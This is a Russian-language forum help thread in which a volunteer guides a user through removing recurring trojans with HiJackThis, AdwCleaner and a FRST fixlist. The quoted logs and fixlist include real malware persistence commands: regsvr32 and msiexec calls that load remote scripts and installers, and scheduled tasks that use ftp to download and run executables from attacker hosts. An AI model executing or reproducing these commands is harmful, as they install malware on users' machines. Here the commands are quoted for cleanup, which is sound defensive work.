Enuard 0 Опубликовано 28 ноября, 2018 Share Опубликовано 28 ноября, 2018 Добрый день. Очень неприятная ситуация. если в кратце - каждый день просматриваю антивирусом (др.веб куррент) на наличие вирусов - каждый день появляются одни и те же вирусы. Вчера перед сном, снова прогнал антивирус, удалил все найденные файлы, удалил задачи в планировщике задач, прогнал антивирусом снова - ничего не нашёл. запустил интернет, полазил в сети, прогнал через 40 минут - снова ничего не нашёл.Сегодня утром, включив компьютер, проверил антивирусом - ничего не нашёл. вышел в сеть. полазил 1 час и вуаля - картина прежняя - снова всё то же самое, только в меньшем количестве. Скрин троянов прилагаю. Я удалял уже раз 10 данные вирусы, но каким то чудом они появляются снова и снова. Что нужно сделать? самое интересное то, что каким то образом в планировщик задач виндовс ложится троянская задача, которая активируется при включении компьютера. Но каким образом она туда ложиться, как? Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 28 ноября, 2018 Share Опубликовано 28 ноября, 2018 https://[url=http://forum.kasperskyclub.ru/index.php?showtopic=43640]Порядок оформления запроса о помощи[/url] Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 28 ноября, 2018 Автор Share Опубликовано 28 ноября, 2018 (изменено) https://[url=http://forum.kasperskyclub.ru/index.php?showtopic=43640]Порядок оформления запроса о помощи[/url] Этот файл нужно загрузить? Лог сделал уже после ручной чистки системы. С планировщика задач удалял самостоятельно. CollectionLog-2018.11.28-12.04.zip Изменено 28 ноября, 2018 пользователем Enuard Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 28 ноября, 2018 Share Опубликовано 28 ноября, 2018 После работы отвечу Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 28 ноября, 2018 Share Опубликовано 28 ноября, 2018 Деинсталлируйте: Kodobi Muz.La QIPApp SafeFinder Time tasks Unity Web Player YoutubeAdBlock YoutubeDownloader Амиго Кнопка "Яндекс" на панели задач Пофиксите следующие строчки в HiJackThis (используйте версию из папки Автологгера). R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Default_Search_URL] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text={searchTerms} R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Bar] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms} R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Page] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms} R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = http://securedsearch.lavasoft.com/?pr=vmn&id=webcompa&ent=hp_WCYID10477_754_181124 R0 - HKCU\Software\Microsoft\Internet Explorer\Search: [Default_Search_URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms} R0-32 - HKLM\Software\Microsoft\Internet Explorer\Search: [CustomizeSearch] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text= R0-32 - HKLM\Software\Microsoft\Internet Explorer\Search: [SearchAssistant] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text= R1 - HKCU\Software\Microsoft\Internet Explorer\Main: [SearchAssistant] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms} R3 - HKCU: Default URLSearchHook is missing R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3C}: [URL,SuggestionsURL,SuggestionsURLFallback] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text={searchTerms} - >> R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3D}: [URL,SuggestionsURL,SuggestionsURLFallback] = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=c01fc2a04166ff35ba624364796eddf3&text= - >> R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9}: [URL,TopResultURL] = http://securedsearch.lavasoft.com/results.php?pr=vmn&id=webcompa&ent=ch_WCYID10477_754_181124&q={searchTerms} - Ad-Aware SecureSearch R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}: [SuggestionsURL_JSON] = http://suggestqueries.google.com/complete/search?output=firefox&client=firefox&qu={searchTerms} - Search the web R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}: [URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOt8TKsjoR8UVcuB-A2Yd6_d0ne-75_Oz1wxElBzmLzR2gPRvo9zsUIhjWeQlXAKI6rk1TZeq0gycD-TNf1vd5VS7d5002ctfhFWUXtkJctVCMKqphnfe4uHBI7lHqq_PFhJ2XbHpnFWN7C0Clt2dpWQK6VU0C8Oymi_GVrOheQ,,&q={searchTerms} - Search the web O2 - HKLM\..\BHO: YoutubeAdBlock - {D1660F2C-BBC4-4D94-A6BA-EB25BC207DA5} - C:\Program Files (x86)\loreCZYyGIE\tX4f0SHi.dll (file missing) O2-32 - HKLM\..\BHO: YoutubeAdBlock - {D1660F2C-BBC4-4D94-A6BA-EB25BC207DA5} - C:\Program Files (x86)\loreCZYyGIE\khWBmmjYw.dll (file missing) O4 - MSConfig\startupreg: 3409050 [command] = C:\Users\TES_EidEnuard\AppData\Roaming\c3ctu3bioct\thu0uaobnre.exe /VERYSILENT (HKCU) (2018/11/24) (file missing) O4 - MSConfig\startupreg: 6715148 [command] = C:\Users\TES_EidEnuard\AppData\Roaming\ofgjqr2sfa3\wmlzrhprcbu.exe /VERYSILENT (HKCU) (2018/11/24) (file missing) O4 - MSConfig\startupreg: GoogleChromeAutoLaunch_0A5C1D289E966614EB8E1614E6915EC6 [command] = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --no-startup-window /prefetch:5 (HKCU) (2018/11/24) O4 - MSConfig\startupreg: Kodobi [command] = C:\Users\TES_EidEnuard\AppData\Roaming\Kodobi\python\pythonw.exe "load.pyc" ml2 (HKCU) (2018/11/24) (file missing) O4 - MSConfig\startupreg: LateCherry [command] = C:\Windows\rss\csrss.exe (HKCU) (2018/11/24) O4 - MSConfig\startupreg: MailRuUpdater [command] = C:\Users\TES_EidEnuard\AppData\Local\Mail.Ru\MailRuUpdater.exe (HKCU) (2015/04/19) (file missing) O4 - MSConfig\startupreg: Multitimer [command] = C:\Program Files (x86)\Multitimer\Multitimer.exe (HKLM) (2018/11/24) (file missing) O4 - MSConfig\startupreg: P9-PJsboRr.exe [command] = C:\Program Files\Common Files\HIYOKC07A\P9-PJsboRr.exe (HKCU) (2018/11/24) O4 - MSConfig\startupreg: QIPApp [command] = C:\Users\TES_EidEnuard\AppData\Roaming\QIPApp\QIPApp.exe (HKCU) (2018/11/24) (file missing) O4 - MSConfig\startupreg: Timestasks [command] = C:\Program Files (x86)\Zaxar\timetasks.exe (HKLM) (2015/04/19) (file missing) O4 - MSConfig\startupreg: YoutubeDownloader [command] = C:\Users\TES_EidEnuard\AppData\Roaming\YoutubeDownloader\python\pythonw.exe "start.pyc" ml3 (HKCU) (2018/11/24) (file missing) O4 - MSConfig\startupreg: YoutubeDownloader_upd [command] = C:\Users\TES_EidEnuard\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe "start.pyc" ml3 (HKCU) (2018/11/24) (file missing) O4 - MSConfig\startupreg: ZaxarGameBrowser [command] = C:\Program Files (x86)\Zaxar\ZaxarGameBrowser.exe -s (HKLM) (2015/04/19) (file missing) O4 - MSConfig\startupreg: ZaxarLoader [command] = C:\Program Files (x86)\Zaxar\ZaxarLoader.exe /verysilent (HKLM) (2015/04/19) (file missing) O4 - MSConfig\startupreg: amigo [command] = C:\Users\TES_EidEnuard\AppData\Local\Amigo\Application\amigo.exe --no-startup-window (HKCU) (2015/04/19) O4 - MSConfig\startupreg: baidusdTray [command] = C:\Program Files (x86)\Baidu\BaiduSd\3.0.0.4605\BaiduSdTray.exe -stmd=3 (HKLM) (2015/04/19) (file missing) O4 - MSConfig\startupreg: chrome [command] = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --headless --disable-gpu --remote-debugging-port=9222 http://ner-de-mi-nis-6.info/cdn-495.html?t=0.4 (HKLM) (2018/11/24) O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll (HKLM) (2018/11/27) O4 - MSConfig\startupreg: start1 [command] = C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/08/06) O4 - MSConfig\startupreg: windowsmanager [command] = C:\Users\TES_EidEnuard\AppData\Local\Temp\5290\5290.exe (HKCU) (2015/04/19) (file missing) O4 - User Startup: C:\Users\TES_EidEnuard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutorunsDisabled (folder) O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll O20 - HKLM\..\Windows: [AppInit_DLLs] = C:\ProgramData\Kolnixo\Ranex.dll (file missing) O20-32 - HKLM\..\Windows: [AppInit_DLLs] = C:\ProgramData\Kolnixo\Sunlam.dll (file missing) Скачайте AdwCleaner (by Xplode) и сохраните его на Рабочем столе. Запустите его (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Сканировать" и дождитесь окончания сканирования. Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[s00].txt. Прикрепите отчет к своему следующему сообщению. Подробнее читайте в этом руководстве. Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 28 ноября, 2018 Автор Share Опубликовано 28 ноября, 2018 Данный лог? AdwCleanerS00.txt Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 29 ноября, 2018 Share Опубликовано 29 ноября, 2018 Запустите повторно AdwCleaner (by Xplode) (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan", а по окончанию сканирования нажмите кнопку "Очистить" ("Clean") и дождитесь окончания удаления. Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[C00].txt. Прикрепите отчет к своему следующему сообщению Внимание: Для успешного удаления нужна перезагрузка компьютера!!!. Подробнее читайте в этом руководстве. Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 30 ноября, 2018 Автор Share Опубликовано 30 ноября, 2018 Появилось 2 файла. AdwCleanerS01.txt AdwCleanerC01.txt Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 30 ноября, 2018 Share Опубликовано 30 ноября, 2018 Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files". Нажмите кнопку Scan. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении. Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 1 декабря, 2018 Автор Share Опубликовано 1 декабря, 2018 прикрепляю. FRST.txt Addition.txt Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 1 декабря, 2018 Share Опубликовано 1 декабря, 2018 ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows! Временно выгрузите антивирус, файрволл и прочее защитное ПО. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: CloseProcesses: HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp0930.host:280/v.sct scrobj.dll HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: F - F:\setup.exe HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: {025d3e04-e211-11e4-97c1-806e6f6e6963} - D:\SETUP.EXE HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: {17bc0f4c-641a-11e5-b3d8-eac460abedba} - F:\AutoRun.exe {D2D77DC2-8299-11D1-8949-444553540000} 5.2066.1.A11B02 PID_0083 HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: {1f7a6424-ff08-11e5-8239-e741ff5375b4} - F:\Autorun.exe HKU\S-1-5-21-2671287706-1935948236-906580463-1000\...\MountPoints2: {4a745ccf-9d27-11e6-8f34-9819b52af906} - E:\setup.exe GroupPolicy: Restriction - Chrome <==== ATTENTION GroupPolicy\User: Restriction ? <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{55863ed5-349c-4e75-9ba2-e35dfdca26ad} <==== ATTENTION (Restriction - IP) C:\Users\TES_EidEnuard\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccfifbojenkenpkmnbnndeadpfdiffof C:\Users\TES_EidEnuard\AppData\Local\Google\Chrome\User Data\Default\Extensions\dncemeillcpbjocckembodmbpaclamkp C:\Users\TES_EidEnuard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfmjpfoggikolkfilofbpgcnhdcgahib OPR Extension: (Универсальный перевод для Chrome) - C:\Users\TES_EidEnuard\AppData\Roaming\Opera Software\Opera Stable\Extensions\gdalhedleemkkdjddjgfjmcnbpejpapp [2015-04-22] OPR Extension: (No Name) - C:\Users\TES_EidEnuard\AppData\Roaming\Opera Software\Opera Stable\Extensions\jniljaamodclkmphgkgkooplflhkadpg [2017-06-15] S2 Windows Audio Control; C:\Program Files (x86)\Common Files\conime.exe -s [X] S1 bd0001; C:\Windows\SysWOW64\DRIVERS\bd0001.sys [202704 2015-04-19] (Baidu) S1 bd0002; C:\Windows\SysWOW64\DRIVERS\bd0002.sys [198600 2015-04-19] (Baidu) S0 58203443; system32\drivers\85127761.sys [X] S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X] S1 bd0003; system32\DRIVERS\bd0003.sys [X] S2 BDArKit; \??\C:\Windows\System32\Drivers\BDArKit.SYS [X] S1 BDFileDefend; system32\DRIVERS\BDFileDefend.sys [X] S1 BDMWrench_x64; system32\DRIVERS\BDMWrench_x64.sys [X] S1 BdSandBox; system32\DRIVERS\BdSandBox.sys [X] 2018-11-30 05:35 - 2018-11-30 19:37 - 000003520 _____ C:\Windows\System32\Tasks\Mysa 2018-11-30 05:35 - 2018-11-30 19:37 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3 2018-11-30 05:35 - 2018-11-30 19:37 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2 2018-11-30 05:35 - 2018-11-30 19:37 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1 2018-11-30 05:35 - 2018-11-30 19:37 - 000003186 _____ C:\Windows\System32\Tasks\ok 2018-11-25 15:42 - 2018-11-30 20:30 - 000000081 _____ C:\Windows\system32\s 2018-11-25 15:42 - 2018-11-30 20:30 - 000000079 _____ C:\Windows\system32\ps 2018-11-25 15:42 - 2018-11-30 20:30 - 000000077 _____ C:\Windows\system32\p 2018-11-24 12:04 - 2018-11-24 12:04 - 000000000 ____D C:\Users\TES_EidEnuard\AppData\LocalLow\uVLgKJnzBrgAs 2018-11-24 11:54 - 2018-11-25 14:42 - 000000008 __RSH C:\Users\TES_EidEnuard\ntuser.pol 2018-11-24 11:36 - 2018-11-24 11:36 - 002024733 _____ C:\Users\TES_EidEnuard\AppData\Local\Vianix.tst 2018-11-24 11:36 - 2018-11-24 11:36 - 001995264 _____ (TODO: <Company name>) C:\Users\TES_EidEnuard\AppData\Local\Vianix.exe 2018-11-24 11:36 - 2018-11-24 11:36 - 001895384 _____ C:\Users\TES_EidEnuard\AppData\Local\Mathdex.bin 2018-11-24 11:36 - 2018-11-24 11:36 - 000722944 _____ C:\Users\TES_EidEnuard\AppData\Local\sham.db 2018-11-24 11:36 - 2018-11-24 11:36 - 000278510 _____ C:\Users\TES_EidEnuard\AppData\Local\Hatlight.bin 2018-11-24 11:36 - 2018-11-24 11:36 - 000140800 _____ C:\Users\TES_EidEnuard\AppData\Local\installer.dat 2018-11-24 11:36 - 2018-11-24 11:36 - 000126464 _____ C:\Users\TES_EidEnuard\AppData\Local\noah.dat 2018-11-24 11:36 - 2018-11-24 11:36 - 000070896 _____ C:\Users\TES_EidEnuard\AppData\Local\Config.xml 2018-11-24 11:36 - 2018-11-24 11:36 - 000005568 _____ C:\Users\TES_EidEnuard\AppData\Local\md.xml 2018-11-24 11:36 - 2018-11-24 11:36 - 000000003 _____ C:\Users\TES_EidEnuard\AppData\Local\wbem.ini 2018-11-30 19:37 - 2018-03-21 15:29 - 000000171 _____ C:\Program Files\Common Files\xp.dat 2018-11-30 19:36 - 2018-06-27 04:59 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat 2018-11-24 10:29 - 2018-08-18 20:22 - 000000086 _____ C:\Program Files\Common Files\nsaok.dat 2013-02-07 15:22 - 2013-02-07 15:22 - 000050330 _____ () C:\Program Files (x86)\AntiDust.exe 2016-04-05 21:12 - 2002-09-12 10:05 - 000000453 _____ () C:\Program Files (x86)\ggwdc.ini 2018-08-18 20:22 - 2018-11-24 10:29 - 000000086 _____ () C:\Program Files\Common Files\nsaok.dat 2018-03-21 15:29 - 2018-11-30 19:37 - 000000171 _____ () C:\Program Files\Common Files\xp.dat 2018-06-27 04:59 - 2018-11-30 19:36 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat 2018-11-24 11:36 - 2018-11-24 11:36 - 007813632 _____ () C:\Users\TES_EidEnuard\AppData\Local\agent.dat 2018-11-24 11:36 - 2018-11-24 11:36 - 000070896 _____ () C:\Users\TES_EidEnuard\AppData\Local\Config.xml 2018-11-24 13:26 - 2018-11-24 13:26 - 006161408 _____ () C:\Users\TES_EidEnuard\AppData\Local\dump007.dat 2018-11-24 11:36 - 2018-11-24 11:36 - 000278510 _____ () C:\Users\TES_EidEnuard\AppData\Local\Hatlight.bin 2018-11-24 11:36 - 2018-11-24 11:36 - 000140800 _____ () C:\Users\TES_EidEnuard\AppData\Local\installer.dat 30598-05-30 11:27 - 30598-05-30 11:27 - 000186368 ____N (Microsoft Corporation) C:\Users\TES_EidEnuard\AppData\Local\iYmPYkeVYOOIF.exe 2018-11-24 11:36 - 2018-11-24 11:36 - 001895384 _____ () C:\Users\TES_EidEnuard\AppData\Local\Mathdex.bin 2018-11-24 11:36 - 2018-11-24 11:36 - 000005568 _____ () C:\Users\TES_EidEnuard\AppData\Local\md.xml 2018-11-24 11:36 - 2018-11-24 11:36 - 000126464 _____ () C:\Users\TES_EidEnuard\AppData\Local\noah.dat 2018-11-25 12:17 - 2018-11-25 14:29 - 000007627 _____ () C:\Users\TES_EidEnuard\AppData\Local\Resmon.ResmonCfg 2018-11-24 11:36 - 2018-11-24 11:36 - 000722944 _____ () C:\Users\TES_EidEnuard\AppData\Local\sham.db 2018-11-24 11:36 - 2018-11-24 11:36 - 000032038 _____ () C:\Users\TES_EidEnuard\AppData\Local\uninstall_temp.ico 2018-11-24 11:36 - 2018-11-24 11:36 - 001995264 _____ (TODO: <Company name>) C:\Users\TES_EidEnuard\AppData\Local\Vianix.exe 2018-11-24 11:36 - 2018-11-24 11:36 - 002024733 _____ () C:\Users\TES_EidEnuard\AppData\Local\Vianix.tst 2018-11-24 11:36 - 2018-11-24 11:36 - 000000003 _____ () C:\Users\TES_EidEnuard\AppData\Local\wbem.ini Task: {009817C0-455B-48E2-991B-9C03ED82246E} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa Task: {0694AA53-66CA-431F-8DB7-B737DEABBD8B} - \NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION Task: {0DDFF42A-51A9-4C81-9B33-0F76ED5C98E9} - \NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION Task: {392AAA25-BB34-4EAC-B4AE-2E62D6798DC1} - \NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION Task: {3B5FF40A-E972-4103-B5C5-5C29A4C8FA40} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {3FF2EA7B-FF0B-45E5-AAA4-319FC18D2B00} - \YoutubeDownloader -> No File <==== ATTENTION Task: {4492BAB8-F6C8-4635-8A41-7CBAC2949559} - \ClwhhsndxrpfQ2 -> No File <==== ATTENTION Task: {4FED48E9-0429-4D83-98D4-719CE7FBED0F} - \Kodobi -> No File <==== ATTENTION Task: {5551218B-E4C7-4DB8-942A-979832795BA1} - \GameNet -> No File <==== ATTENTION Task: {59DD6E35-407B-43D6-B3A8-647D54C3FF88} - \YoutubeDownloader_upd -> No File <==== ATTENTION Task: {6421A2F1-39A3-417D-AA71-0F074547D866} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {6C13B6A3-1D39-439A-8A40-D388FEB4BFCE} - \NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION Task: {6CFA1A02-53EB-492D-8672-C56D48CE9CA3} - \NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION Task: {715D7ECA-37EA-4B5B-87A8-6B9120279DE8} - \GoogleUpdateTaskMachineCore -> No File <==== ATTENTION Task: {74F95EC3-F666-4118-A88C-68E54DC42147} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION Task: {7B3C6D90-365D-43ED-BD1F-72DFB651B6AA} - \GoogleUpdateTaskMachineUA -> No File <==== ATTENTION Task: {9632AFFB-50F3-4486-9A3C-0932C1FEE407} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION Task: {B9A75CEC-6F7D-44AC-B4DF-ED379B7B602F} - \NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION Task: {F3A09529-D564-486C-9E44-F4881DF28604} - \NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} -> No File <==== ATTENTION Task: {F3C334C7-A1D4-4580-9CD9-DFB20A690CCB} - \Kodobi2 -> No File <==== ATTENTION WMI:subscription\__TimerInstruction->fuckyoumm2_itimer: <==== ATTENTION WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer: <==== ATTENTION C:\Windows\rss FirewallRules: [{C406C767-D75E-4FAB-A623-44AF4D24CA79}] => (Allow) C:\Windows\rss\csrss.exe FirewallRules: [{EFB2418D-FBD3-40FD-892B-0DED0A225588}] => (Allow) C:\Windows\rss\csrss.exe EmptyTemp: Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 2 декабря, 2018 Автор Share Опубликовано 2 декабря, 2018 (изменено) Прикрепляю фикслог, файла Дата_время.zip не обнаружил. Fixlog.txt Изменено 2 декабря, 2018 пользователем Enuard Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 2 декабря, 2018 Share Опубликовано 2 декабря, 2018 Новые логи FRST.txt, Addition.txt сделайте Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 2 декабря, 2018 Автор Share Опубликовано 2 декабря, 2018 прикрепляю. Вчера устанавливал было майл агент и хотел проверить одно приложение от майла. Установился gamecentr майловский, после обнаружил снова появившийся конхост. Сегодня проверил через Др.Веб куррент, он так же обнаружил данный конхост. вместе с ним обнаружил задачи в планировщике задач виндовса: Mysa, Mysa1, Mysa2, Mysa3, ok. В очередной раз удалил данные задачи. До установки майл агента и геймцентра майловского не проверял на наличие данных троянов. FRST.txt Addition.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 3 декабря, 2018 Автор Share Опубликовано 3 декабря, 2018 Ну так что можно сделать? вирусы снова появилисьт, как понимаю, они скачиваются через какое то приложение\программу. При подключении к сети, происходит скачивание файлов и автоматический запуск через систему Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.